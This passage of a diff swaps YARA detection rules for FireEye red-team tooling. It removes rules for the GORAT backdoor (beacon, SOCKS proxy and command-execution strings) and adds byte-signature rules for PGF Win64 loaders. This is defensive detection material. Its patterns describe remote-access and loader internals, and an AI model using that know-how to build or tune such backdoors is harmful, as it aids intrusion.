8B 05 69 8A 06 00 FF D0 48 8D 15 0A C8 05 00 48 89 C1 48 8B 05 5E 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 19 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 01 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 E0 F9 FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 87 F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CB 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 37 FC 00 00 48 89 D8 48 89 C1 E8 4C AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9A 9C 01 00 48 89 D8 48 89 C1 E8 2F AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$cond2 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8D 85 ?? ?? ?? ?? 41 B8 04 01 00 00 48 89 C2 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 89 C2 B9 08 00 00 00 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 38 04 00 00 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 48 8D 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 41 B8 00 00 00 00 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 FF 0F 95 C0 84 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 48 8B 45 ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 45 ?? 48 89 E8 48 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 C7 45 ?? 00 00 00 00 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 39 C2 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 73 ?? 48 8B 45 ?? 48 8B 00 48 8B 55 ?? 48 81 C2 00 10 00 00 48 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 8B 4D ?? 48 8B 55 ?? 48 01 CA 48 39 D0 0F 83 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 8B 45 ?? 48 8B 00 48 8D 95 ?? ?? ?? ?? 41 B8 30 00 00 00 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 48 8B 45 ?? 48 8B 00 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 00 00 00 00 EB ?? 90 EB ?? 90 48 83 45 ?? 08 E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 48 63 D0 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 89 C2 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 01 00 00 00 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB 01 EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$cond3 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 C1 7C 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 33 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 B2 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 75 96 01 00 48 8D 45 AF 48 89 C1 E8 B9 FE 00 00 48 8B 05 66 7C 06 00 FF D0 89 C2 B9 08 00 00 00 E8 3C B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 83 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 2A F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 28 B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 69 7B 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 11 B9 05 00 48 8B 05 A2 7B 06 00 FF D0 48 8D 15 0D B9 05 00 48 89 C1 48 8B 05 97 7B 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 5A 7B 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 22 7B 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 59 FB FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 00 FB FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 94 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 00 FC 00 00 48 89 D8 48 89 C1 E8 45 AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 63 9C 01 00 48 89 D8 48 89 C1 E8 28 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$cond4 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 D3 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 65 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 EC FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AF 96 01 00 48 8D 45 AF 48 89 C1 E8 F3 FE 00 00 48 8B 05 78 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6E B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 B5 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 64 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 5A B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 73 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 45 C8 05 00 48 8B 05 B4 8A 06 00 FF D0 48 8D 15 41 C8 05 00 48 89 C1 48 8B 05 A9 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 6C 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 54 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 33 FA FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 DA F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CE 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 3A FC 00 00 48 89 D8 48 89 C1 E8 4F AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9D 9C 01 00 48 89 D8 48 89 C1 E8 32 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
 }
-rule FIREEYE_RT_Trojan_MSIL_GORAT_Plugin_DOTNET_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_4 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Plugin - .NET' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "faa73d64-4bb1-5c06-a3a5-1f1aa99ea932"
-		date = "2020-12-09"
+		id = "4c93ba76-d3a5-568d-88b8-79a6ebc2edbb"
+		date = "2020-11-26"
+		date = "2020-11-26"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Plugin_DOTNET_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_4.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e979822273c6d1ccdfebd341c9e2cb1040fe34a04e8b41c024885063fd946ad5"
+		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
+		logic_hash = "fcc92674e58ec6418d7c709e3f3bc2e1ec859fe0cb444412964a978fb69f5234"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "cd9407d0-fc8d-41ed-832d-da94daa3e064" ascii nocase wide
-		$typelibguid1 = "fc3daedf-1d01-4490-8032-b978079d8c2d" ascii nocase wide
+		$sb1 = { 41 B9 04 00 00 00 41 B8 00 10 00 00 BA [4] B9 00 00 00 00 [0-32] FF [1-24] 7? [1-150] 8B 45 [0-32] 44 0F B? ?? 8B [2-16] B? CD CC CC CC [0-16] C1 ?? 04 [0-16] C1 ?? 02 [0-16] C1 ?? 02 [0-16] 48 8? 05 [4-32] 31 [1-4] 88 }
+		$sb2 = { C? 45 ?? 48 [0-32] B8 [0-64] FF [0-32] E0 [0-32] 41 B8 40 00 00 00 BA 0C 00 00 00 48 8B [2] 48 8B [2-32] FF [1-16] 48 89 10 8B 55 ?? 89 ?? 08 48 8B [2] 48 8D ?? 02 48 8B 45 18 48 89 02 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Backdoor_Macos_GORAT_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_1 : FILE
 {
 	meta:
-		description = "This rule is looking for specific strings associated with network activity found within the MacOS generated variant of GORAT"
+		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
 		author = "FireEye"
-		id = "4646eadb-7acf-582f-9ad6-00f012ceed8a"
-		date = "2020-12-09"
+		id = "1f2280c0-0fdd-5930-947a-931274bccd6f"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_MacOS_GORAT_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "68acf11f5e456744262ff31beae58526"
-		logic_hash = "2df5f87d44968670511880d21ad184779d0561c7c426a5d6426bcefd0904a9b7"
+		hash = "2b686a8b83f8e1d8b455976ae70dab6e"
+		logic_hash = "2e84d614c34b0b7f93fa70fa3312f22e3ff23f2abd33b2e19c00dd6cba7dcfdc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
-
-	strings:
-		$s1 = "SID1=%s" ascii wide
-		$s2 = "http/http.dylib" ascii wide
-		$s3 = "Mozilla/" ascii wide
-		$s4 = "User-Agent" ascii wide
-		$s5 = "Cookie" ascii wide
-
-	condition:
-		(( uint32( 0 ) == 0xBEBAFECA ) or ( uint32( 0 ) == 0xFEEDFACE ) or ( uint32( 0 ) == 0xFEEDFACF ) or ( uint32( 0 ) == 0xCEFAEDFE ) ) and all of them
-}
-rule FIREEYE_RT_APT_Backdoor_Win_Gorat_Memory
-{
-	meta:
-		description = "Identifies GoRat malware in memory based on strings."
-		author = "FireEye"
-		id = "16fb1db7-711c-5d8d-9203-738c94f253fe"
-		date = "2020-12-09"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GoRat_Memory.yar#L4-L27"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
-		logic_hash = "88272e59325d106f96d6b6f1d57daf968823c1e760067dee0334c66c521ce8c2"
-		score = 75
-		quality = 75
-		tags = ""
 		rev = 1
 
 	strings:
-		$murica = "murica" fullword
-		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat2 = "rat.(*Core).generateBeacon" fullword
-		$rat3 = "rat.gJitter" fullword
-		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
-		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
-		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
-		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
-		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
-		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
-		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
-		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
+		$sb1 = { B9 14 00 00 00 FF 15 [4-32] 0F B6 ?? 04 [0-32] F3 A4 [0-64] 0F B6 [2-3] 0F B6 [2-3] 33 [0-32] 88 [1-9] EB }
+		$sb2 = { 41 B8 00 30 00 00 [0-32] FF 15 [8-64] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [1-64] FF ( D? | 5? ) }
+		$sb3 = { 48 89 4C 24 08 [4-64] 48 63 48 3C [0-32] 48 03 C1 [0-64] 0F B7 48 14 [0-64] 48 8D 44 08 18 [8-64] 0F B7 40 06 [2-32] 48 6B C0 28 }
 
 	condition:
-		$winblows or #murica > 10 or 3 of ( $rat* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_5 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "base dlls: /lib/payload/techniques/dllmain/"
 		author = "FireEye"
-		id = "73102bd2-7b94-5c7b-b9a4-cfc9cf5e3212"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "5253cb2a-28fd-57ab-be3d-f11cf2ea24cf"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_5.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f"
-		logic_hash = "67f85fb3bedfd18a1226c92318f387be3c7ff9566ca2d554c49cf62389482552"
+		hash = "4326a7e863928ffbb5f6bdf63bb9126e"
+		logic_hash = "074f6d9ad78ecd4dd8e3d0b5c8b0f61a48374f3935b85c4222305b207b447ec7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$1 = "comms.BeaconData" fullword
-		$2 = "comms.CommandResponse" fullword
-		$3 = "rat.BaseChannel" fullword
-		$4 = "rat.Config" fullword
-		$5 = "rat.Core" fullword
-		$6 = "platforms.AgentPlatform" fullword
-		$7 = "GetHostID" fullword
-		$8 = "/rat/cmd/gorat_shared/dllmain.go" fullword
+		$sb1 = { B9 [4] FF 15 [4-32] 8B ?? 1C [0-16] 0F B? ?? 04 [0-64] F3 0F 6F 00 [0-64] 66 0F EF C8 [0-64] F3 0F 7F 08 [0-64] 30 ?? 48 8D 40 01 48 83 ?? 01 7? }
+		$sb2 = { 44 8B ?? 08 [0-32] 41 B8 00 30 00 00 [0-16] FF 15 [4-32] 48 8B C8 [0-16] E8 [4-64] 4D 8D 49 01 [0-32] C1 ?? 04 [0-64] 0F B? [2-16] 41 30 ?? FF 45 3? ?? 7? }
+		$sb3 = { 63 ?? 3C [0-16] 03 [1-32] 0F B? ?? 14 [0-16] 8D ?? 18 [0-16] 03 [1-16] 66 ?? 3B ?? 06 7? [1-64] 48 8D 15 [4-32] FF 15 [4-16] 85 C0 [2-32] 41 0F B? ?? 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Trojan_MSIL_GORAT_Module_Powershell_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win_PGF_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Module - PowerShell' project."
+		description = "PE rich header matches PGF backdoor"
 		author = "FireEye"
-		id = "b0fba130-9cd9-5b7f-a806-9ff8099f5731"
+		id = "595c9e2a-3d9d-5366-9449-de1bcf333f78"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Module_PowerShell_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e596bc0316a4ef85f04c2683ebc7c94bf9b831843232c33e62c84991e4caeb97"
+		hash = "226b1ac427eb5a4dc2a00cc72c163214"
+		logic_hash = "b8c024c6b4c3ce9915700b62da8a1f12440215b46f3a56078707f5257e575811"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		md5_2 = "2398ed2d5b830d226af26dedaf30f64a"
+		md5_3 = "24a7c99da9eef1c58f09cf09b9744d7b"
+		md5_4 = "aeb0e1d0e71ce2a08db9b1e5fb98e0aa"
+		rev = 4
 
 	strings:
-		$typelibguid0 = "38d89034-2dd9-4367-8a6e-5409827a243a" ascii nocase wide
-		$typelibguid1 = "845ee9dc-97c9-4c48-834e-dc31ee007c25" ascii nocase wide
+		$rich1 = { A8 B7 17 3A EC D6 79 69 EC D6 79 69 EC D6 79 69 2F D9 24 69 E8 D6 79 69 E5 AE EC 69 EA D6 79 69 EC D6 78 69 A8 D6 79 69 E5 AE EA 69 EF D6 79 69 E5 AE FA 69 D0 D6 79 69 E5 AE EB 69 ED D6 79 69 E5 AE FD 69 E2 D6 79 69 CB 10 07 69 ED D6 79 69 E5 AE E8 69 ED D6 79 69 }
+		$rich2 = { C1 CF 75 A4 85 AE 1B F7 85 AE 1B F7 85 AE 1B F7 8C D6 88 F7 83 AE 1B F7 0D C9 1A F6 87 AE 1B F7 0D C9 1E F6 8F AE 1B F7 0D C9 1F F6 8F AE 1B F7 0D C9 18 F6 84 AE 1B F7 DE C6 1A F6 86 AE 1B F7 85 AE 1A F7 BF AE 1B F7 84 C3 12 F6 81 AE 1B F7 84 C3 E4 F7 84 AE 1B F7 84 C3 19 F6 84 AE 1B F7 }
